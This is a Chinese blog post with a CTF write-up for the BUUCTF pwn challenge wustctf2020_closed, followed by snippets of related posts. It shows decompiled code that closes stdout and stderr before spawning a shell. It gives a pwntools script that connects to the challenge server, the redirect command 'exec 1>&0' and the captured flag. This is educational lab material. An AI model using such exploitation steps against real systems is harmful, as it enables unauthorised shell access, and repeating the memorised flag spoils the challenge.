[buuctf]wustctf2020_closed

最新推荐文章于 2025-05-04 10:56:11 发布
最新推荐文章于 2025-05-04 10:56:11 发布
阅读量448 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: # buuctf PWN 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125576742
本文解析了wustctf2020_closed挑战中的一个64位无壳可执行文件,通过IDA分析了其main、init及vulnerable函数。利用重定向技巧绕过限制获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

wustctf2020_closed

解析

还是第一步进行查壳,发现是无壳的64位的可执行文件,之后进入ida中查看main函数。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  init();
  vulnerable();
  return 0;
}

第一个函数里面就是最开始运行的那个界面。

int init()
{
  alarm(0x20u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  return puts(
           "   __  ___    ______   ___    \n"
           "  /  |/  /__ /_  __/__<  /_ __\n"
           " / /|_/ / _ `// / / __/ /\\ \\ /\n"
           "/_/  /_/\\_,_//_/ /_/ /_//_\\_\\ \n");
}

在这里插入图片描述
之后是第二个函数。

int vulnerable()
{
  puts("HaHaHa!\nWhat else can you do???");
  close(1);
  close(2);
  return shell();
}

之后查看了close()这个函数的作用是什么,发现是1是正常输出,2是错误输出,之后返回的是shell,那么我们直接进行重定向进行输出即可参考文章链接: linux重定向,运行起来之后输入exec 1>&0即可

脚本

先用pwntools进行远程,之后手动输入exec 1>&0
获得的flag是flag{b755c682-c167-4e3c-9524-3b16f16becf6}
第一步:

from pwn import *
context(os = 'linux',arch = 'arm64',log_level = 'debug')
p = remote('node4.buuoj.cn',29258)
p.interactive()

第二步:
在这里插入图片描述
第三步:
在这里插入图片描述

BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4468
BUUCTF刷题记录
buuctf习题pwn(51~60
yw__y的博客
03-01 391
buuctf wustctf2020_closed stdout
weixin_45441024的博客
12-07 492
buuctf wustctf2020_closed stdout 一开始还是check一下 ida分析发现vuln函数,根据经验觉得这个是漏洞函数,双击进入,发现调用了两次close()函数 可以发现关掉了标准输出和错误输出,最后调用了一个shell函数 可以看到这里为后门 今天这里新涉及到一个知识点,因为1和2文件描述符不可用了,所以对stdout重定向,将文件描述符 1 重定向到文件描述符 0 : exec 1>&0 成功getshell ...
[BUUCTF-pwn]——wustctf2020_closed
Y_peak的博客
04-02 861
[BUUCTF-pwn]——wustctf2020_closed 相信看过题目反汇编的人都知道. 这个题目直接给了你shell 但是为什么输入cat flag无法得到flag. 其实就是因为close(1) 这个命令将你的标准输出给关掉了. 也就意味着, 无法输出任何东西给你 你们应该也看到了其他一些, wp 说只要exec 1>&0就可以了 但是你们却不知道这个的具体含义 exec 也就是重定位在Linux里面 exec 1>&0的意思就是将标准输出定位到标准输入的文件. &a
[BUUCTF]PWN——wustctf2020_closed
mcmuyanga的博客
01-12 3775
wustctf2020_closed 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,首先是检索程序里的字符串,找到了后门 main函数里的关键函数 close(1)关闭了标准输出 close(2)关闭了标准错误 我们只剩下标准输入,并且看到程序会返回shell(0是标准输入,1是标准输出,2是标准错误) 在看了别人的wp之后了解到,原来可以对stdout重定向,将文件描述符 1 重定向到文件描述符 0 : 因此这题不用写exp,直接执行 ex
wustctf2020_closed
z1r0的博客
12-23 451
wustctf2020_closed 查看保护 这题长知识了。close(1)close(2)关掉了标准输出和标准错误 学到了execv,execv 1>&0标准输出重定向到标准输入,可以看成重启了一下标准输出,这时就可以看到输出的内容了。 ...
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1722
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32
cainiao78777的博客
04-29 365
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
wustctf2020_closedlinux重定位)
weixin_61283545的博客
06-15 192
exec 1>&0_luooofan的博客-CSDN博客这篇博客讲的很清楚。记住下来看一下linux,确实不能只在乎题目。
BUUCTF Pwn wustctf2020_closed WP
最新发布
qq_33348179的博客
05-04 157
需要进行重定向 输入exec 1>&0 即可。关闭了标准输入和输出后再执行binsh。
基本栈溢出
2302_80125280的博客
07-03 279
vulnerable函数中buf数组可写字节为24个字节,但是read函数可写入为0x20个字节,所以此处存在栈溢出。RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。Stack为no canary found 说明可能可进行栈溢出。NO PIE说明没有开启地址随机化。NX 保护开启说明堆栈不可执行。发现后门函数shell。
武科WUST-CTF2020“Tiki组 ”
pone2233的博客
03-29 1356
文章目录赛事信息题目状态:Web:admin | SOLVED |checkin | SOLVED |CV Maker | SOLVED |Reverse:无Pwn:无Misc:Find me | SOLVED |爬 | SOLVED |签到 | SOLVED |Alison likes jojo | SOLVED |Space Club | SOLVED |三人行 | SOLVED |girlf...
WUST-CTF2020 writeup
abtgu的博客
04-02 1669
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
wust2020个人赛1
dream_muyouzhi的博客
04-30 239
B - To the Max 题意:给定一个n*n的矩阵,从中找出一个小矩阵使其内元素和最大。 思路:由于n最大为100,所以考虑暴力枚举。 枚举方式:枚举小矩阵占据行的区间[r1,r2],然后只剩下列的选取,可近似看成一个一维数组求最大连续字段和,这里可选择DP或递推,递推则是扫一遍数组,用一个sum加上每个元素,sum<0时取0,求出最大sum。 E - Chinese Girls’ ...
[WUSTCTF2020]level1
weixin_47158947的博客
08-05 1859
用ida打开level,查看字符串,有一个很明显的flag,打开,汇编 int __cdecl main(int argc, const char **argv, const char **envp) { FILE *stream; // ST08_8 signed int i; // [rsp+4h] [rbp-2Ch] char ptr[24]; // [rsp+10h] [rbp-20h] unsigned __int64 v7; // [rsp+28h] [rbp-8h] v.
WUST-CTF2020-WP
夏日 の blog
03-29 5586
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3471
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
BUUCTF:[WUSTCTF2020]find_me
末初 · mochu7
11-01 3858
题目地址:https://buuoj.cn/challenges#[WUSTCTF2020]find_me 题目如下: exiftool发现盲文 盲文在线加解密:https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen flag{y$0$u_f$1$n$d$_M$e$e$e$e$e}
ERR_CONNECTION_CLOSED
09-12
ERR_CONNECTION_CLOSED错误是指计算机与网站之间的连接出现问题,而不是网站本身出现问题。 出现这个错误可能是由于以下几个原因: 1. 检查网络连接,确保您的计算机能够正常连接到互联网。 2. 某些Chrome扩展程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值